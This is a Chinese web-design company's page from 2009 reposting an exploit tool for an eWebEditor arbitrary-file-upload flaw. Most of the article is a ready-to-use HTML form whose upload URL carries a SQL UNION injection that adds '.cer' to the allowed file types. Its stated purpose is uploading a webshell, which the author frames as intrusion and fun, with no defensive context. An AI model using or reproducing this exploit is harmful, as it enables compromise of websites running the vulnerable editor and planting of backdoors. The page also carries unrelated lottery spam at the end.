青海網站建設、網絡推廣最好的公司--您身邊的網站建設專家,馬上拿起電話,聯系我們:0971-8235355   
青海西寧網站建設、網站制作公司-西寧威勢電子信息服務有限公司 首頁 |  公司簡介 |  網站建設 |  網絡推廣 |  空間租用 |  域名注冊 |  企業郵局 |  網絡安全 |  網站編程 |  客服中心 |  聯系我們 |  人才招聘
 
西寧威勢最新網站制做案例展示
Lastest Project
 
西寧網站建設  
當前位置為:首頁 >> 腳本安全 >> 正文  
[原創]ewebeditor上傳任意文件漏洞利用工具

文章來源: 西寧威勢電子信息服務有限公司     發布時間:2009-5-3    瀏覽次數:10980    tags:ewebeditor 注入

    注意有些版本沒有此漏洞,具體什么版本號,我沒有測試,大家在利用前先確定版本號,以確認有漏洞,要不然下面的文章會測試不成功!

    漏洞引起的原因請參看下文:

http://www.usjndq.live/ShowNews/?11-20095317001981643.html

    作者的思路很妙,利用UNION語句,將執行結果調出來,然后加入自定義的文件后輟名,真是好辦法,這種方法除了在這里可以用到,我想在以后的入侵過種中還會發揮很大的作用,作者說用NC抓包提交就可以做到上傳木馬,但是那個東東修改數據包,修改發送字節數之類的很麻煩,稍不留心就會失敗,服務器返回提交參數錯誤之類的信息,看了很不爽,我用NC試了兩次都沒成功,一不做,二不休,我干脆做成一個HTML的,方便使用,直接給出代碼如下:

   

<HTML>
<HEAD>
<TITLE>文件上傳</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css">
body, a, table, div, span, td, th, input, select{font:9pt;font-family: "宋體", Verdana, Arial, Helvetica, sans-serif;}
body {padding:0px;margin:0px}
</style>

</head>
<body bgcolor=menu>

<form action="/Edit/upload.asp?action=save&type=IMAGE&style=standard' union select 1,2,3,4,S_UploadDir,6,7,8,9,10,11, ([S_ImageExt]%2b'|cer'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=1 style="width:100%" onChange="originalfile.value=this.value">
<input type=hidden name=originalfile value=""><input name="" type="submit" value="提交">
</form>

</body>
</html>

    利用的時候,直接把上面的代碼存成HTML文件,ACTION中指定上傳文件的路徑,直接上傳CER文件,搞定!祝大家玩的開心一點!

 


上一篇:常見的一句話木馬
下一篇:Dvbbs8.1 0DAY(通殺access和mssql版本)
評論列表
正在加載評論……
  
評論   
呢  稱:
驗證碼: 若看不清請點擊更換!
內  容:
 
 
  在線洽談咨詢:
點擊這里,在線洽談   點擊這里,在線洽談   點擊這里,在線洽談
與我交談  與我交談 與我交談
乘車路線    匯款方式   加盟合作  人才招聘  
公司地址:青海省西寧市西關大街73號(三二四部隊招行所四樓)     青ICP備13000578號-1 公安機關備案號:63010402000123    
QQ:147399120    mail:[email protected]    電話: 13897410341    郵編:810000
© Copyright( 2008-2009) QhWins.Com All Rights Reserved    版權所有:西寧威勢電子信息服務有限公司 未經書面制授權,請勿隨意轉載!
業務:青海網站制做青海網站建設青海網頁設計西寧網站制做西寧網站建設青海域名注冊青海網絡推廣青海網站推廣青海空間租用青海軟件開發網站安全網絡安全

香港六合彩开奖结果网